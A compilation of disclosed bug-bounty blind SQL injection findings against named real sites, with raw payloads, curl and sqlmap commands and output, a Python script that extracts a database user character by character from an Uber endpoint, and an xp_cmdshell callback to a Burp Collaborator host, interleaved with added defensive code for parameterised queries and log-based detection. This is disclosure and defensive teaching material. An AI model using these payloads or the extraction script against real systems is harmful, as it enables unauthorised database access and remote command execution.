After subscribing to Uber in China, an advertisement was sent to the associated email account. The unsubscribe link in that email differs from Uber's normal unsubscribe link.
The researcher discovered a Time Based Blind SQLi on the news.starbucks.com domain. The vulnerability exists in an HTTP POST request to the home path of the Starbucks domain, in the group_id body parameter. The request with the payload is illustrated below:
The request successfully delays the server response time.
The researcher also illustrates how to determine the database version through the following requests using curl:
The response time for the version-5 probe is greater than for the version-4 probe, meaning the SLEEP executed on the first request (version 5), proving the database version is 5.
Exploiting the vulnerability using SQLMap and retrieving the available databases and DBMS info as a PoC:
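The root cause behind a finding like the group_id one above is a query built from request text. The following is an added example, not code from the write-up or from Starbucks: a vulnerable lookup next to its parameterised fix, run against an in-memory SQLite database with constructed sample rows (the table name, columns and rows are assumptions). SQLite has no SLEEP(), so a boolean tautology stands in for the time-based payload; the point it makes is the same, that attacker-controlled text is parsed as SQL in one version and bound as data in the other.

```python
# Added example (not from the write-up): vulnerable lookup beside its
# parameterised fix, using an in-memory SQLite database with constructed rows.
import sqlite3


def build_db():
    """Constructed sample data: three groups, mirroring a site_id/group_id lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE groups (group_id TEXT, site_id INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO groups VALUES (?, ?, ?)",
        [("1", 1, "press"), ("2", 1, "investors"), ("3", 2, "careers")],
    )
    return conn


def groups_vulnerable(conn, site_id, group_id):
    """String-built query: group_id is pasted straight into the SQL text."""
    sql = ("SELECT name FROM groups WHERE site_id = %d AND group_id = '%s'"
           % (site_id, group_id))
    return [row[0] for row in conn.execute(sql)]


def groups_safe(conn, site_id, group_id):
    """Parameterised query: group_id is bound as a value, never parsed as SQL."""
    sql = "SELECT name FROM groups WHERE site_id = ? AND group_id = ?"
    return [row[0] for row in conn.execute(sql, (site_id, group_id))]


if __name__ == "__main__":
    conn = build_db()
    # Legitimate value: both code paths agree.
    print(groups_vulnerable(conn, 1, "1"))   # ['press']
    print(groups_safe(conn, 1, "1"))         # ['press']
    # Injected value in the shape of the page's payload: close the quote, add
    # SQL, and end with a comparison so the statement stays syntactically valid.
    probe = "1' OR '1'='1"
    print(groups_vulnerable(conn, 1, probe))  # every row leaks, site_id filter bypassed
    print(groups_safe(conn, 1, probe))        # [] -- no group has that literal id
```

In the vulnerable path the WHERE clause becomes `site_id = 1 AND group_id = '1' OR '1'='1'`, and AND binds tighter than OR, so the site filter is discarded as well; a time-based probe such as the IF(...,SLEEP(1),0) one on the page lands in exactly the same position. The parameterised path returns nothing for the probe because no row has the literal string as its id.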
The URL https://redacted.com/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1 contains a URL parameter, c0-param0, that is vulnerable to Blind SQLi.
In the example below, the researcher uses SQLMap to exploit the vulnerability. Near the end of the output, SQLMap reports the back-end database type as a Proof of Concept.
The API interface on https://contactws.contact-sys.com:3456/ accepts a <REQUEST/> body to interact with the server's AppServ object. Because of insufficient input validation, an attacker can abuse the SCEN_ID parameter to inject arbitrary SQL statements into the WHERE clause of the underlying SQL statement. This leads to a blind SQL injection vulnerability, which in turn leads to Remote Code Execution on the server.
The unedited HTTP POST Request
The researcher makes use of Burp Suite's Collaborator, a network service that can be used to detect out-of-band SQL injection. In short, it provides a unique subdomain that is embedded in the payload; when the backend server resolves that subdomain, the DNS lookup reaches the Collaborator server, which records it. Collaborator has other uses, such as out-of-band exfiltration, but a DNS hit alone is enough of a PoC to prove that the server is vulnerable to blind out-of-band SQLi.
The SCEN_ID body parameter is modified to invoke xp_cmdshell and ping the Burp Suite Collaborator server using the unique subdomain generated (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net). This causes a DNS request for that subdomain to reach the burpcollaborator.net server.
Issuing the request successfully causes the web server to perform a DNS lookup of the domain. The server can be seen reaching out to Burp Suite's Collaborator with the unique subdomain (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net).
The researcher also used SQLMap to exploit this vulnerability and retrieve the database name. The sqlitest.txt file is the above HTTP POST request.
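The DNS callback that proved the contactws.contact-sys.com finding is also what a defender can alarm on: a database server has little reason to resolve names under an out-of-band testing domain, or names whose leftmost label is a long random token. The following is an added example, not the researcher's code, that scans constructed DNS query log lines for exactly that. The log format (`<timestamp> <client_ip> <qname>`), the database server address in DB_SERVER_IPS, and the length and entropy thresholds in looks_generated are assumptions; the burpcollaborator.net name is the one from the page.

```python
# Added example (not from the write-up): flag DNS lookups from the database
# tier to out-of-band testing domains or to generated-looking hostnames.
import math
import re
from collections import Counter

# Out-of-band testing domain seen on this page; extend with others you track.
OAST_DOMAINS = ("burpcollaborator.net",)

# Hypothetical address of the SQL Server host. A DNS query for an external
# name from the database tier is unusual enough to deserve its own rule.
DB_SERVER_IPS = {"10.0.2.15"}

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qname>\S+)$")


def label_entropy(label):
    """Shannon entropy in bits per character of one DNS label."""
    if not label:
        return 0.0
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(label):
    """Assumed heuristic: at least 20 chars and more than 3.5 bits/char."""
    return len(label) >= 20 and label_entropy(label) > 3.5


def scan_dns_log(lines):
    """Return (client, qname, reason) for every suspicious lookup, in log order."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        client = m.group("client")
        qname = m.group("qname").rstrip(".").lower()
        reasons = []
        if any(qname == d or qname.endswith("." + d) for d in OAST_DOMAINS):
            reasons.append("known OAST domain")
        if looks_generated(qname.split(".")[0]):
            reasons.append("generated-looking leftmost label")
        if reasons and client in DB_SERVER_IPS:
            reasons.append("query originated from database server")
        if reasons:
            alerts.append((client, qname, "; ".join(reasons)))
    return alerts


# Constructed sample log: two benign lookups and the callback name from the page.
SAMPLE_LOG = [
    "2020-01-30T10:05:01Z 10.0.1.20 www.contact-sys.com.",
    "2020-01-30T10:05:02Z 10.0.2.15 wsus.corp.local.",
    "2020-01-30T10:05:03Z 10.0.2.15 yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net.",
]

if __name__ == "__main__":
    for alert in scan_dns_log(SAMPLE_LOG):
        print(alert)
```

Only the third line fires, on all three reasons. The same finding is also a configuration issue on the server side: xp_cmdshell is disabled by default in SQL Server and can be kept off through sp_configure, and the login the application uses should not be a member of sysadmin, so that an injection in the WHERE clause cannot be turned into command execution in the first place.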
The lang cookie parameter was found to be vulnerable to SQLi. The request was sent with the following payload, and the server delayed its response:
The regId HTTP URL parameter on http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674 is vulnerable to Blind SQLi. The researcher illustrates this through the use of SQLMap.
The backend treats whatever follows the path as a tag name and, on receiving the request, searches for that tag. The path https://betterscience.org/plugin/tag/ takes anything appended to the URL path as a tag and displays the result. By issuing a specifically crafted SQL payload in that path segment it is possible to trigger Blind SQLi.
HTTP JSON POST parameter docid is vulnerable to Blind SQLi.
Quoting qonqi:
for a TRUE query we get - {"d":"3"}
for a FALSE - {"d":""}
for a Syntax error - {"Message":"There was an error processing the request.","StackTrace":"","ExceptionType":""}
so using this blind technique we can extract the data from Database
examples
docId:"1 and (select substring(@@version,1,1))='M'" - true
docId:"1 and (select substring(@@version,2,1))='i'" - true
docId:"1 and (select substring(@@version,3,1))='c'" - true
docId:"1 and (select substring(@@version,22,1))='2'"
docId:"1 and (select substring(@@version,23,1))='0'"
docId:"1 and (select substring(@@version,24,1))='0'"
docId:"1 and (select substring(@@version,25,1))='8'"
The topsort URL parameter on https://www.tube8.fr/ajax-hof/?toplimit=2&topsort=followers+or+sleep(0.000000001) is vulnerable to Blind SQLi.
The request below contains the payload in the URL parameter. The researcher stated that any larger value in the sleep function makes the application time out, possibly because the injection point is in a WHERE clause that is evaluated for every record in the table.
The pub_group_id HTTP GET URL parameter at https://βββ/pubs/get_publications.php is vulnerable to Blind SQL Injection.
The payload below, placed in the pub_group_id parameter, contains a 5 second delay. Issuing the request successfully delays the response by 5 seconds.
The researcher used SQLMap to exploit the vulnerability. The test.txt file contains the above HTTP GET request (without the payload).
The researcher discovered that the labs.data.gov website has a route, /dashboard/datagov/csv_to_json, that is vulnerable to Blind SQLi via the User-Agent HTTP header.
Appending the following payload to the User-Agent Header delays the response time by 25 seconds:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
The appended payload can be seen in the request below. By issuing that request, the researcher showed that the server takes 25 seconds to respond.
The doc_id URL parameter on the /library.php route was found to be vulnerable to Blind SQLi. Issuing the request below makes the server delay its response by 5 seconds. The payload 1 AND (SELECT * FROM (SELECT(SLEEP(1)))WUeh) is URL encoded and placed into the doc_id URL parameter.
Researcher discovered the countID URL parameter on the route https://www.xn--4zhaa/public/saveCount.cfm?countID=4 is vulnerable to Blind SQLi. Illustrated below, the researcher uses SQLMap to exploit the vulnerability and retrieve the banner for the database.
The route https://βββ/hro/html/tech.cfm?Sort=SLEEP(25)&ThisType=3 contains the URL parameter Sort, which is vulnerable to Blind SQLi. Issuing the request to the URL with the payload SLEEP(25) delays the server's response by 25 seconds.
The rememail body parameter of the HTTP POST request is vulnerable to Blind SQLi.
The researcher illustrates how to retrieve the database version through blind SQLi: if the guessed version is correct the response is delayed by 2 seconds, otherwise it returns immediately. This can be used to iterate over each possible version number to detect which version is currently in use.
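Every time-based probe on this page (SLEEP, sleep(5*5) behind now()=sysdate(), DBMS_PIPE.RECEIVE_MESSAGE) and every boolean probe (the @@version and user() substring oracles, sqlmap's `AND 5454=5454`) leaves a recognisable token in the request and, for the timing ones, a measurable delay in the response. The following is an added detection example, not code from any of the write-ups: it decodes each request's path, query and User-Agent, matches them against a small signature list, and marks alerts where the response time confirms the delay ran. The log format (Combined Log Format with one extra trailing field, response time in milliseconds), the 1000 ms threshold and the signature list are assumptions; the payload shapes in the constructed sample lines are taken from the page.

```python
# Added example (not from the write-ups): signature plus timing detection for
# blind SQLi probes over constructed access-log lines.
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format with an assumed trailing response-time field (ms).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" (?P<ms>\d+)$'
)

# Signature name -> regex run over the percent-decoded, lower-cased text.
SIGNATURES = [
    ("time-delay function",
     re.compile(r"(?:sleep|benchmark|pg_sleep|dbms_lock\.sleep|dbms_pipe\.receive_message)\s*\(")),
    ("waitfor delay", re.compile(r"waitfor\s+delay")),
    ("heavy-query timing trick", re.compile(r"now\(\)\s*=\s*sysdate\(\)")),
    ("version/user fingerprint", re.compile(r"@@version|version\s*\(\s*\)|user\s*\(\s*\)")),
    ("numeric tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+")),
    ("os command procedure", re.compile(r"xp_cmdshell")),
]


def match_signatures(text):
    """Names of every signature that fires on the decoded text, in list order."""
    decoded = unquote_plus(text).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_access_log(lines, slow_ms=1000):
    """One alert per suspicious line; 'slow' means the response exceeded slow_ms."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        hits = []
        for field, text in (("path", parts.path), ("query", parts.query),
                            ("user-agent", m.group("ua"))):
            hits.extend((field, name) for name in match_signatures(text))
        if not hits:
            continue
        ms = int(m.group("ms"))
        alerts.append({
            "client": m.group("client"),
            "target": m.group("target"),
            "hits": hits,
            "response_ms": ms,
            # A slow response on a line carrying a delay signature means the
            # injected function most likely executed: treat as confirmed.
            "slow": ms >= slow_ms,
        })
    return alerts


# Constructed sample log; request shapes mirror the findings on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2020:10:05:07 +0000] "GET /api/tweets?city_id=(select(0)from(select(sleep(25)))v) HTTP/1.1" 200 50 "-" "Mozilla/5.0" 25034',
    '203.0.113.5 - - [30/Jan/2020:10:06:01 +0000] "GET /ajax-hof/?toplimit=2&topsort=followers+or+sleep(0.000000001) HTTP/1.1" 200 812 "-" "Mozilla/5.0" 131',
    '198.51.100.9 - - [30/Jan/2020:10:07:15 +0000] "GET /dashboard/datagov/csv_to_json HTTP/1.1" 200 311 "-" "Mozilla/5.0 \'XOR(if(now()=sysdate(),sleep(5*5),0))OR\'" 25011',
    '198.51.100.9 - - [30/Jan/2020:10:08:00 +0000] "GET /library.php?doc_id=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0" 41',
    '198.51.100.9 - - [30/Jan/2020:10:08:09 +0000] "GET /library.php?doc_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(1)))WUeh) HTTP/1.1" 200 4096 "-" "Mozilla/5.0" 1048',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert["client"], alert["target"][:40], alert["hits"], alert["slow"])
```

Four of the five sample lines alert; the plain doc_id=12 request does not. The second line is the tube8 case: its tiny sleep value never produces a measurable delay, so the signature is what catches it, which is why the two checks are combined rather than relying on response time alone. POST bodies and cookies (the Starbucks, contact-sys and lang-cookie findings) are not in an access log, so the same match_signatures function would need to be fed from a WAF or application-level log to cover them.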
{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
{"user_id": "5755", "receiver": "orange@mymail"}
# Boolean-based blind extraction script from the Uber China write-up, re-indented
# (indentation was lost in extraction) and ported from Python 2 to Python 3.
import json
import string
import requests
from urllib.parse import quote
from base64 import b64encode

# Candidate characters tried at each position of user().
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}

for l in range(0, 30):
    for i in 'i' + base:
        # True condition returns a non-empty body; false returns an empty one.
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#" % (l + 1, i)
        new_payload = json.dumps(payload)
        # The unsubscribe link carries the JSON as base64 in the p parameter.
        new_payload = b64encode(new_payload.encode()).decode()
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=' + quote(new_payload))
        if len(r.content) > 0:
            print(i, end='')
            break
POST / HTTP/1.1
Host: news.starbucks.com
Connection: close
Content-Length: 81
Cache-Control: max-age=0
Origin: https://news.starbucks.com
Content-Type: application/x-www-form-urlencoded
ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(1=1,SLEEP(1),0) AND group_id='1
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='5',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m4.945s
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='4',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m1.005s
root@kali:~/bugbounty# sqlmap -u "https://ββββ/βββββββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1*"
_
___ ___| |_____ ___ ___ {1.0.8.2#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:21:54
custom injection marking character ('*') found in option '-u'. Do you want to pry
[20:22:03] [INFO] testing connection to the target URL
[20:22:04] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:04] [INFO] testing if the target URL is stable
[20:22:05] [INFO] target URL is stable
[20:22:05] [INFO] testing if URI parameter '#1*' is dynamic
[20:22:05] [WARNING] URI parameter '#1*' does not appear dynamic
[20:22:05] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Oracle')
[20:22:05] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:20] [WARNING] reflective value(s) found and filtering out
[20:22:21] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:22:23] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:22:24] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:50] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:10] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:33] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[20:23:43] [INFO] URI parameter '#1*' is 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' injectable
[20:23:43] [INFO] testing 'Oracle inline queries'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:23:43] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (heavy query)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind'
[20:23:45] [INFO] testing 'Oracle OR time-based blind'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle OR time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[20:24:16] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[20:24:46] [INFO] URI parameter '#1*' appears to be 'Oracle AND time-based blind (heavy query)' injectable
[20:24:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 418 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
Payload: https://βββββ:443/βββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 9965=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9965=9965) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)))-- Goij
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: https://ββββββ:443/ββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 4917=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- vKNF
---
[20:34:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[20:34:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ββββββββββ'
[*] shutting down at 20:34:42
~/sqlmap# ./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId
.. snip ..
GET parameter 'regId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
Parameter: regId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regId=478836614) AND 5454=5454 AND (5202=5202&locationId=464559674
[17:38:22] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache
back-end DBMS: PostgreSQL
15:25 ~: time curl "http://www.lahitapiola.fi/cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1310812269330%27%20AND%205851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5)%20AND%20%27bar%27=%27bar" -O /dev/null
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1019 100 1019 0 0 196 0 0:00:05 0:00:05 --:--:-- 256
curl: (3) <url> malformed
real 0m5.186s
user 0m0.004s
sys 0m0.008s
https://stats2.agilecrm.com/addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam
#Output presumably from sqlmap
Database version: MySQL 5.0.12
Server hostname: localhost
Databases: information_schema; mysql; performance_schema; stats
Stats: 3; persons; map.
python sqlmap.py -u https://www.xn--4zhaaaaaaaaa/public/saveCount.cfm?countID=4 --level=3 --risk=3
#Output
Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64)
Mar 19 2015 12:32:14
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
GET /api/tweets?city_id=(select(0)from(select(sleep(25)))v) HTTP/1.1
Host: windows10.hi-tech.mail.ru
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Vββββββββ
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Thu, 30 Jan 2020 10:05:07 GMT
Content-Type: text/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 50
{"status":"ok","last_id":0,"data":[],"total":"0"}